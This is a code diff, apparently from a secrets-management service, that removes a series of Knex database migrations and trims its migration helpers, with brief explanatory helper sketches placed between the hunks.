        // Create Folder Tree Checkpoint Resources
        // eslint-disable-next-line no-await-in-loop
        await knex
          .batchInsert(
            TableName.FolderTreeCheckpointResources,
            newCommitsInserted.map((folderCommit) => ({
              folderTreeCheckpointId: newTreeCheckpointsMap[folderCommit.envId],
              folderId: folderCommit.folderId,
              folderCommitId: folderCommit.id
            }))
          )
          .returning("*");

        logger.info(`Finished inserting folder tree checkpoint resources - batch ${j} of ${commitBatches.length}`);
      }
    }
  }
  logger.info("Folder commits initialized");
}

export async function down(knex: Knex): Promise<void> {
  const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
  if (hasFolderCommitTable) {
    // delete all existing entries
    await knex(TableName.FolderCommit).del();
  }
}
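chunkArray (imported from @app/lib/fn above) is what bounds the batch sizes throughout these migrations. A minimal sketch consistent with how it is called here; the real implementation in @app/lib/fn may differ:

// Minimal sketch of a chunking helper matching the call sites above:
// chunkArray(items, size) groups items into arrays of at most `size` elements.
export const chunkArray = <T>(items: T[], size: number): T[][] => {
  const chunks: T[][] = [];
  for (let i = 0; i < items.length; i += size) {
    chunks.push(items.slice(i, i + size));
  }
  return chunks;
};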
@ -1,44 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasStepColumn = await knex.schema.hasColumn(TableName.AccessApprovalPolicyApprover, "sequence");
  const hasApprovalRequiredColumn = await knex.schema.hasColumn(
    TableName.AccessApprovalPolicyApprover,
    "approvalsRequired"
  );
  if (!hasStepColumn || !hasApprovalRequiredColumn) {
    await knex.schema.alterTable(TableName.AccessApprovalPolicyApprover, (t) => {
      if (!hasStepColumn) t.integer("sequence").defaultTo(1);
      if (!hasApprovalRequiredColumn) t.integer("approvalsRequired").nullable();
    });
  }

  // set rejected status for all access requests that were rejected and still have status pending
  const subquery = knex(TableName.AccessApprovalRequest)
    .leftJoin(
      TableName.AccessApprovalRequestReviewer,
      `${TableName.AccessApprovalRequestReviewer}.requestId`,
      `${TableName.AccessApprovalRequest}.id`
    )
    .where(`${TableName.AccessApprovalRequest}.status` as "status", "pending")
    .where(`${TableName.AccessApprovalRequestReviewer}.status` as "status", "rejected")
    .select(`${TableName.AccessApprovalRequest}.id`);

  await knex(TableName.AccessApprovalRequest).where("id", "in", subquery).update("status", "rejected");
}

export async function down(knex: Knex): Promise<void> {
  const hasStepColumn = await knex.schema.hasColumn(TableName.AccessApprovalPolicyApprover, "sequence");
  const hasApprovalRequiredColumn = await knex.schema.hasColumn(
    TableName.AccessApprovalPolicyApprover,
    "approvalsRequired"
  );
  if (hasStepColumn || hasApprovalRequiredColumn) {
    await knex.schema.alterTable(TableName.AccessApprovalPolicyApprover, (t) => {
      if (hasStepColumn) t.dropColumn("sequence");
      if (hasApprovalRequiredColumn) t.dropColumn("approvalsRequired");
    });
  }
}
@ -1,23 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasTokenReviewModeColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "tokenReviewMode");

  if (!hasTokenReviewModeColumn) {
    await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
      table.string("tokenReviewMode").notNullable().defaultTo("api");
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasTokenReviewModeColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "tokenReviewMode");

  if (hasTokenReviewModeColumn) {
    await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
      table.dropColumn("tokenReviewMode");
    });
  }
}
@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasShowSnapshotsLegacyColumn = await knex.schema.hasColumn(TableName.Project, "showSnapshotsLegacy");
  if (!hasShowSnapshotsLegacyColumn) {
    await knex.schema.table(TableName.Project, (table) => {
      table.boolean("showSnapshotsLegacy").notNullable().defaultTo(false);
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasShowSnapshotsLegacyColumn = await knex.schema.hasColumn(TableName.Project, "showSnapshotsLegacy");
  if (hasShowSnapshotsLegacyColumn) {
    await knex.schema.table(TableName.Project, (table) => {
      table.dropColumn("showSnapshotsLegacy");
    });
  }
}
@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasConfigColumn = await knex.schema.hasColumn(TableName.DynamicSecretLease, "config");
  if (!hasConfigColumn) {
    await knex.schema.alterTable(TableName.DynamicSecretLease, (table) => {
      table.jsonb("config");
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasConfigColumn = await knex.schema.hasColumn(TableName.DynamicSecretLease, "config");
  if (hasConfigColumn) {
    await knex.schema.alterTable(TableName.DynamicSecretLease, (table) => {
      table.dropColumn("config");
    });
  }
}
@ -1,45 +0,0 @@
import { Knex } from "knex";

import { selectAllTableCols } from "@app/lib/knex";

import { TableName } from "../schemas";

const BATCH_SIZE = 1000;

export async function up(knex: Knex): Promise<void> {
  const hasKubernetesHostColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "kubernetesHost");

  if (hasKubernetesHostColumn) {
    await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
      table.string("kubernetesHost").nullable().alter();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasKubernetesHostColumn = await knex.schema.hasColumn(TableName.IdentityKubernetesAuth, "kubernetesHost");

  // find all rows where kubernetesHost is null
  const rows = await knex(TableName.IdentityKubernetesAuth)
    .whereNull("kubernetesHost")
    .select(selectAllTableCols(TableName.IdentityKubernetesAuth));

  if (rows.length > 0) {
    for (let i = 0; i < rows.length; i += BATCH_SIZE) {
      const batch = rows.slice(i, i + BATCH_SIZE);
      // eslint-disable-next-line no-await-in-loop
      await knex(TableName.IdentityKubernetesAuth)
        .whereIn(
          "id",
          batch.map((row) => row.id)
        )
        .update({ kubernetesHost: "" });
    }
  }

  if (hasKubernetesHostColumn) {
    await knex.schema.alterTable(TableName.IdentityKubernetesAuth, (table) => {
      table.string("kubernetesHost").notNullable().alter();
    });
  }
}
@ -1,29 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";

export async function up(knex: Knex): Promise<void> {
  if (!(await knex.schema.hasTable(TableName.IdentityAliCloudAuth))) {
    await knex.schema.createTable(TableName.IdentityAliCloudAuth, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
      t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
      t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
      t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
      t.jsonb("accessTokenTrustedIps").notNullable();
      t.timestamps(true, true, true);
      t.uuid("identityId").notNullable().unique();
      t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
      t.string("type").notNullable();

      t.string("allowedArns").notNullable();
    });
  }

  await createOnUpdateTrigger(knex, TableName.IdentityAliCloudAuth);
}

export async function down(knex: Knex): Promise<void> {
  await knex.schema.dropTableIfExists(TableName.IdentityAliCloudAuth);
  await dropOnUpdateTrigger(knex, TableName.IdentityAliCloudAuth);
}
@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasCol = await knex.schema.hasColumn(TableName.Identity, "hasDeleteProtection");
  if (!hasCol) {
    await knex.schema.alterTable(TableName.Identity, (t) => {
      t.boolean("hasDeleteProtection").notNullable().defaultTo(false);
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasCol = await knex.schema.hasColumn(TableName.Identity, "hasDeleteProtection");
  if (hasCol) {
    await knex.schema.alterTable(TableName.Identity, (t) => {
      t.dropColumn("hasDeleteProtection");
    });
  }
}
@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
  if (hasColumn) {
    await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
      t.string("allowedPrincipalArns", 2048).notNullable().alter();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
  if (hasColumn) {
    await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
      t.string("allowedPrincipalArns", 255).notNullable().alter();
    });
  }
}
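The migrations above all repeat one idempotency pattern: probe with hasColumn/hasTable first, then alter only if needed, so re-running a migration is harmless. A hedged generic sketch of that guard; the helper name is illustrative and does not exist in the codebase:

// Hedged sketch: the hasColumn-guarded alterTable pattern the migrations above
// repeat, factored into an illustrative helper.
import { Knex } from "knex";

const addColumnIfMissing = async (
  knex: Knex,
  table: string,
  column: string,
  build: (t: Knex.AlterTableBuilder) => void
) => {
  const exists = await knex.schema.hasColumn(table, column);
  if (!exists) {
    await knex.schema.alterTable(table, build);
  }
};

// usage mirroring the hasDeleteProtection migration above:
// await addColumnIfMissing(knex, "identities", "hasDeleteProtection", (t) =>
//   t.boolean("hasDeleteProtection").notNullable().defaultTo(false)
// );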
@ -1,91 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasEncryptedGithubAppConnectionClientIdColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionClientId"
  );
  const hasEncryptedGithubAppConnectionClientSecretColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionClientSecret"
  );

  const hasEncryptedGithubAppConnectionSlugColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionSlug"
  );

  const hasEncryptedGithubAppConnectionAppIdColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionId"
  );

  const hasEncryptedGithubAppConnectionAppPrivateKeyColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionPrivateKey"
  );

  await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
    if (!hasEncryptedGithubAppConnectionClientIdColumn) {
      t.binary("encryptedGitHubAppConnectionClientId").nullable();
    }
    if (!hasEncryptedGithubAppConnectionClientSecretColumn) {
      t.binary("encryptedGitHubAppConnectionClientSecret").nullable();
    }
    if (!hasEncryptedGithubAppConnectionSlugColumn) {
      t.binary("encryptedGitHubAppConnectionSlug").nullable();
    }
    if (!hasEncryptedGithubAppConnectionAppIdColumn) {
      t.binary("encryptedGitHubAppConnectionId").nullable();
    }
    if (!hasEncryptedGithubAppConnectionAppPrivateKeyColumn) {
      t.binary("encryptedGitHubAppConnectionPrivateKey").nullable();
    }
  });
}

export async function down(knex: Knex): Promise<void> {
  const hasEncryptedGithubAppConnectionClientIdColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionClientId"
  );
  const hasEncryptedGithubAppConnectionClientSecretColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionClientSecret"
  );

  const hasEncryptedGithubAppConnectionSlugColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionSlug"
  );

  const hasEncryptedGithubAppConnectionAppIdColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionId"
  );

  const hasEncryptedGithubAppConnectionAppPrivateKeyColumn = await knex.schema.hasColumn(
    TableName.SuperAdmin,
    "encryptedGitHubAppConnectionPrivateKey"
  );

  await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
    if (hasEncryptedGithubAppConnectionClientIdColumn) {
      t.dropColumn("encryptedGitHubAppConnectionClientId");
    }
    if (hasEncryptedGithubAppConnectionClientSecretColumn) {
      t.dropColumn("encryptedGitHubAppConnectionClientSecret");
    }
    if (hasEncryptedGithubAppConnectionSlugColumn) {
      t.dropColumn("encryptedGitHubAppConnectionSlug");
    }
    if (hasEncryptedGithubAppConnectionAppIdColumn) {
      t.dropColumn("encryptedGitHubAppConnectionId");
    }
    if (hasEncryptedGithubAppConnectionAppPrivateKeyColumn) {
      t.dropColumn("encryptedGitHubAppConnectionPrivateKey");
    }
  });
}
@ -1,28 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";

export async function up(knex: Knex): Promise<void> {
  if (!(await knex.schema.hasTable(TableName.IdentityTlsCertAuth))) {
    await knex.schema.createTable(TableName.IdentityTlsCertAuth, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
      t.bigInteger("accessTokenTTL").defaultTo(7200).notNullable();
      t.bigInteger("accessTokenMaxTTL").defaultTo(7200).notNullable();
      t.bigInteger("accessTokenNumUsesLimit").defaultTo(0).notNullable();
      t.jsonb("accessTokenTrustedIps").notNullable();
      t.timestamps(true, true, true);
      t.uuid("identityId").notNullable().unique();
      t.foreign("identityId").references("id").inTable(TableName.Identity).onDelete("CASCADE");
      t.string("allowedCommonNames").nullable();
      t.binary("encryptedCaCertificate").notNullable();
    });
  }

  await createOnUpdateTrigger(knex, TableName.IdentityTlsCertAuth);
}

export async function down(knex: Knex): Promise<void> {
  await knex.schema.dropTableIfExists(TableName.IdentityTlsCertAuth);
  await dropOnUpdateTrigger(knex, TableName.IdentityTlsCertAuth);
}
@ -1,41 +0,0 @@
import { Knex } from "knex";

import { ProjectType, TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasTypeColumn = await knex.schema.hasColumn(TableName.Project, "type");
  const hasDefaultTypeColumn = await knex.schema.hasColumn(TableName.Project, "defaultProduct");
  if (hasTypeColumn && !hasDefaultTypeColumn) {
    await knex.schema.alterTable(TableName.Project, (t) => {
      t.string("type").nullable().alter();
      t.string("defaultProduct").notNullable().defaultTo(ProjectType.SecretManager);
    });

    await knex(TableName.Project).update({
      // eslint-disable-next-line
      // @ts-ignore this is because this field is created later
      defaultProduct: knex.raw(`
        CASE
          WHEN "type" IS NULL OR "type" = '' THEN 'secret-manager'
          ELSE "type"
        END
      `)
    });
  }

  const hasTemplateTypeColumn = await knex.schema.hasColumn(TableName.ProjectTemplates, "type");
  if (hasTemplateTypeColumn) {
    await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
      t.string("type").nullable().alter();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasDefaultTypeColumn = await knex.schema.hasColumn(TableName.Project, "defaultProduct");
  if (hasDefaultTypeColumn) {
    await knex.schema.alterTable(TableName.Project, (t) => {
      t.dropColumn("defaultProduct");
    });
  }
}
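The defaultProduct backfill above pushes a SQL CASE through knex.raw because the column is added in the same migration. A hedged equivalent expressed as two plain Knex updates; a sketch, not the migration's code:

// Hedged sketch: the same backfill as two targeted updates instead of one raw CASE.
import { Knex } from "knex";

import { TableName } from "../schemas";

const backfillDefaultProduct = async (knex: Knex) => {
  // null or empty "type" falls back to 'secret-manager'
  await knex(TableName.Project)
    .where((qb) => void qb.whereNull("type").orWhere("type", ""))
    // eslint-disable-next-line
    // @ts-ignore the column is created in the same migration, as above
    .update({ defaultProduct: "secret-manager" });
  // every other row copies its existing "type"
  await knex(TableName.Project)
    .whereNotNull("type")
    .whereNot("type", "")
    // eslint-disable-next-line
    // @ts-ignore the column is created in the same migration, as above
    .update({ defaultProduct: knex.raw(`"type"`) });
};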
@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "encryptedEnvOverrides");
  if (!hasColumn) {
    await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
      t.binary("encryptedEnvOverrides").nullable();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "encryptedEnvOverrides");
  if (hasColumn) {
    await knex.schema.alterTable(TableName.SuperAdmin, (t) => {
      t.dropColumn("encryptedEnvOverrides");
    });
  }
}
@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
  await knex.schema.alterTable(TableName.OrgMembership, (t) => {
    if (!hasColumn) {
      t.datetime("lastInvitedAt").nullable();
    }
  });
}

export async function down(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
  await knex.schema.alterTable(TableName.OrgMembership, (t) => {
    if (hasColumn) {
      t.dropColumn("lastInvitedAt");
    }
  });
}
@ -1,23 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");

  if (!hasFipsModeColumn) {
    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
      table.boolean("fipsEnabled").notNullable().defaultTo(false);
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");

  if (hasFipsModeColumn) {
    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
      table.dropColumn("fipsEnabled");
    });
  }
}
@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
  if (hasColumn) {
    await knex.schema.alterTable(TableName.OrgMembership, (t) => {
      t.datetime("lastInvitedAt").nullable().defaultTo(knex.fn.now()).alter();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.OrgMembership, "lastInvitedAt");
  if (hasColumn) {
    await knex.schema.alterTable(TableName.OrgMembership, (t) => {
      t.datetime("lastInvitedAt").nullable().alter();
    });
  }
}
@ -1,46 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

const MIGRATION_TIMEOUT = 30 * 60 * 1000; // 30 minutes

export async function up(knex: Knex): Promise<void> {
  const result = await knex.raw("SHOW statement_timeout");
  const originalTimeout = result.rows[0].statement_timeout;

  try {
    await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);

    // iat means IdentityAccessToken
    await knex.raw(`
      CREATE INDEX IF NOT EXISTS idx_iat_identity_id
      ON ${TableName.IdentityAccessToken} ("identityId")
    `);

    await knex.raw(`
      CREATE INDEX IF NOT EXISTS idx_iat_ua_client_secret_id
      ON ${TableName.IdentityAccessToken} ("identityUAClientSecretId")
    `);
  } finally {
    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
  }
}

export async function down(knex: Knex): Promise<void> {
  const result = await knex.raw("SHOW statement_timeout");
  const originalTimeout = result.rows[0].statement_timeout;

  try {
    await knex.raw(`SET statement_timeout = ${MIGRATION_TIMEOUT}`);

    await knex.raw(`
      DROP INDEX IF EXISTS idx_iat_identity_id
    `);

    await knex.raw(`
      DROP INDEX IF EXISTS idx_iat_ua_client_secret_id
    `);
  } finally {
    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
  }
}
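The index migration above saves, raises, and restores statement_timeout around long-running DDL. A hedged sketch factoring that save/restore into a reusable wrapper; PostgreSQL-specific, and the helper itself is illustrative:

// Hedged sketch: reusable save/raise/restore wrapper for statement_timeout,
// mirroring the try/finally pattern in the migration above (PostgreSQL only).
import { Knex } from "knex";

const withStatementTimeout = async (knex: Knex, timeoutMs: number, fn: () => Promise<void>) => {
  const result = await knex.raw("SHOW statement_timeout");
  const originalTimeout = result.rows[0].statement_timeout;
  try {
    await knex.raw(`SET statement_timeout = ${timeoutMs}`);
    await fn();
  } finally {
    // restore whatever was configured before, e.g. '0' or '30s'
    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
  }
};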
@ -1,55 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const existingSecretApprovalPolicies = await knex(TableName.SecretApprovalPolicy)
    .whereNull("secretPath")
    .orWhere("secretPath", "");

  const existingAccessApprovalPolicies = await knex(TableName.AccessApprovalPolicy)
    .whereNull("secretPath")
    .orWhere("secretPath", "");

  // update all the secret approval policies secretPath to be "/**"
  if (existingSecretApprovalPolicies.length) {
    await knex(TableName.SecretApprovalPolicy)
      .whereIn(
        "id",
        existingSecretApprovalPolicies.map((el) => el.id)
      )
      .update({
        secretPath: "/**"
      });
  }

  // update all the access approval policies secretPath to be "/**"
  if (existingAccessApprovalPolicies.length) {
    await knex(TableName.AccessApprovalPolicy)
      .whereIn(
        "id",
        existingAccessApprovalPolicies.map((el) => el.id)
      )
      .update({
        secretPath: "/**"
      });
  }

  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
    table.string("secretPath").notNullable().alter();
  });

  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
    table.string("secretPath").notNullable().alter();
  });
}

export async function down(knex: Knex): Promise<void> {
  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
    table.string("secretPath").nullable().alter();
  });

  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
    table.string("secretPath").nullable().alter();
  });
}
@ -1,35 +0,0 @@
import { Knex } from "knex";

import { TableName } from "@app/db/schemas";

export async function up(knex: Knex): Promise<void> {
  const hasCommitterCol = await knex.schema.hasColumn(TableName.SecretApprovalRequest, "committerUserId");

  if (hasCommitterCol) {
    await knex.schema.alterTable(TableName.SecretApprovalRequest, (tb) => {
      tb.uuid("committerUserId").nullable().alter();
    });
  }

  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");

  if (hasRequesterCol) {
    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
      tb.dropForeign("requestedByUserId");
      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  // can't undo committer nullable

  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");

  if (hasRequesterCol) {
    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
      tb.dropForeign("requestedByUserId");
      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("SET NULL");
    });
  }
}
@ -1,68 +0,0 @@
import { Knex } from "knex";

import { inMemoryKeyStore } from "@app/keystore/memory";
import { selectAllTableCols } from "@app/lib/knex";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";
import { getMigrationEncryptionServices } from "./utils/services";

export async function up(knex: Knex) {
  const existingSuperAdminsWithGithubConnection = await knex(TableName.SuperAdmin)
    .select(selectAllTableCols(TableName.SuperAdmin))
    .whereNotNull(`${TableName.SuperAdmin}.encryptedGitHubAppConnectionClientId`);

  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });

  const decryptor = kmsService.decryptWithRootKey();
  const encryptor = kmsService.encryptWithRootKey();

  const tasks = existingSuperAdminsWithGithubConnection.map(async (admin) => {
    const overrides = (
      admin.encryptedEnvOverrides ? JSON.parse(decryptor(Buffer.from(admin.encryptedEnvOverrides)).toString()) : {}
    ) as Record<string, string>;

    if (admin.encryptedGitHubAppConnectionClientId) {
      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_ID = decryptor(
        admin.encryptedGitHubAppConnectionClientId
      ).toString();
    }

    if (admin.encryptedGitHubAppConnectionClientSecret) {
      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_SECRET = decryptor(
        admin.encryptedGitHubAppConnectionClientSecret
      ).toString();
    }

    if (admin.encryptedGitHubAppConnectionPrivateKey) {
      overrides.INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY = decryptor(
        admin.encryptedGitHubAppConnectionPrivateKey
      ).toString();
    }

    if (admin.encryptedGitHubAppConnectionSlug) {
      overrides.INF_APP_CONNECTION_GITHUB_APP_SLUG = decryptor(admin.encryptedGitHubAppConnectionSlug).toString();
    }

    if (admin.encryptedGitHubAppConnectionId) {
      overrides.INF_APP_CONNECTION_GITHUB_APP_ID = decryptor(admin.encryptedGitHubAppConnectionId).toString();
    }

    const encryptedEnvOverrides = encryptor(Buffer.from(JSON.stringify(overrides)));

    await knex(TableName.SuperAdmin).where({ id: admin.id }).update({
      encryptedEnvOverrides
    });
  });

  await Promise.all(tasks);
}

export async function down() {
  // No down migration needed as this migration is only for data transformation
  // and does not change the schema.
}
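The data migration above treats encryptedEnvOverrides as a root-key-encrypted JSON object of environment overrides. A hedged sketch of that read-modify-write round trip, with the codec passed in explicitly; the type names are illustrative:

// Hedged sketch of the encryptedEnvOverrides round trip used above.
// decryptor/encryptor stand in for kmsService.decryptWithRootKey()/encryptWithRootKey().
type TRootKeyCodec = {
  decryptor: (data: Buffer) => Buffer;
  encryptor: (data: Buffer) => Buffer;
};

const readOverrides = (codec: TRootKeyCodec, encrypted: Buffer | null): Record<string, string> =>
  encrypted ? (JSON.parse(codec.decryptor(Buffer.from(encrypted)).toString()) as Record<string, string>) : {};

const writeOverrides = (codec: TRootKeyCodec, overrides: Record<string, string>): Buffer =>
  codec.encryptor(Buffer.from(JSON.stringify(overrides)));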
@ -1,8 +1,6 @@
import { z } from "zod";

import { crypto } from "@app/lib/crypto/cryptography";
import { zpStr } from "@app/lib/zod";
import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

const envSchema = z
  .object({
@ -37,7 +35,7 @@ const envSchema = z

export type TMigrationEnvConfig = z.infer<typeof envSchema>;

export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory) => {
export const getMigrationEnvConfig = () => {
  const parsedEnv = envSchema.safeParse(process.env);
  if (!parsedEnv.success) {
    // eslint-disable-next-line no-console
@ -51,24 +49,5 @@ export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory
    process.exit(-1);
  }

  let envCfg = Object.freeze(parsedEnv.data);

  const fipsEnabled = await crypto.initialize(superAdminDAL);

  // Fix for 128-bit entropy encryption key expansion issue:
  // In FIPS it is not ideal to expand a 128-bit key into 256-bit. We solved this issue in the past by creating the ROOT_ENCRYPTION_KEY.
  // If FIPS mode is enabled, we set the value of ROOT_ENCRYPTION_KEY to the value of ENCRYPTION_KEY.
  // ROOT_ENCRYPTION_KEY is expected to be a 256-bit base64-encoded key, unlike the 32-byte key of ENCRYPTION_KEY.
  // When ROOT_ENCRYPTION_KEY is set, our cryptography will always use a 256-bit entropy encryption key. So for the sake of FIPS we should just roll over the value of ENCRYPTION_KEY to ROOT_ENCRYPTION_KEY.
  if (fipsEnabled) {
    const newEnvCfg = {
      ...envCfg,
      ROOT_ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY
    };
    delete newEnvCfg.ENCRYPTION_KEY;

    envCfg = Object.freeze(newEnvCfg);
  }

  return envCfg;
  return Object.freeze(parsedEnv.data);
};
@ -3,27 +3,12 @@ import { Knex } from "knex";
import { initializeHsmModule } from "@app/ee/services/hsm/hsm-fns";
import { hsmServiceFactory } from "@app/ee/services/hsm/hsm-service";
import { TKeyStoreFactory } from "@app/keystore/keystore";
import { folderCheckpointDALFactory } from "@app/services/folder-checkpoint/folder-checkpoint-dal";
import { folderCheckpointResourcesDALFactory } from "@app/services/folder-checkpoint-resources/folder-checkpoint-resources-dal";
import { folderCommitDALFactory } from "@app/services/folder-commit/folder-commit-dal";
import { folderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service";
import { folderCommitChangesDALFactory } from "@app/services/folder-commit-changes/folder-commit-changes-dal";
import { folderTreeCheckpointDALFactory } from "@app/services/folder-tree-checkpoint/folder-tree-checkpoint-dal";
import { folderTreeCheckpointResourcesDALFactory } from "@app/services/folder-tree-checkpoint-resources/folder-tree-checkpoint-resources-dal";
import { identityDALFactory } from "@app/services/identity/identity-dal";
import { internalKmsDALFactory } from "@app/services/kms/internal-kms-dal";
import { kmskeyDALFactory } from "@app/services/kms/kms-key-dal";
import { kmsRootConfigDALFactory } from "@app/services/kms/kms-root-config-dal";
import { kmsServiceFactory } from "@app/services/kms/kms-service";
import { orgDALFactory } from "@app/services/org/org-dal";
import { projectDALFactory } from "@app/services/project/project-dal";
import { resourceMetadataDALFactory } from "@app/services/resource-metadata/resource-metadata-dal";
import { secretFolderDALFactory } from "@app/services/secret-folder/secret-folder-dal";
import { secretFolderVersionDALFactory } from "@app/services/secret-folder/secret-folder-version-dal";
import { secretTagDALFactory } from "@app/services/secret-tag/secret-tag-dal";
import { secretV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-v2-bridge-dal";
import { secretVersionV2BridgeDALFactory } from "@app/services/secret-v2-bridge/secret-version-dal";
import { userDALFactory } from "@app/services/user/user-dal";

import { TMigrationEnvConfig } from "./env-config";

@ -65,77 +50,3 @@ export const getMigrationEncryptionServices = async ({ envConfig, db, keyStore }

  return { kmsService };
};

export const getMigrationPITServices = async ({
  db,
  keyStore,
  envConfig
}: {
  db: Knex;
  keyStore: TKeyStoreFactory;
  envConfig: TMigrationEnvConfig;
}) => {
  const projectDAL = projectDALFactory(db);
  const folderCommitDAL = folderCommitDALFactory(db);
  const folderCommitChangesDAL = folderCommitChangesDALFactory(db);
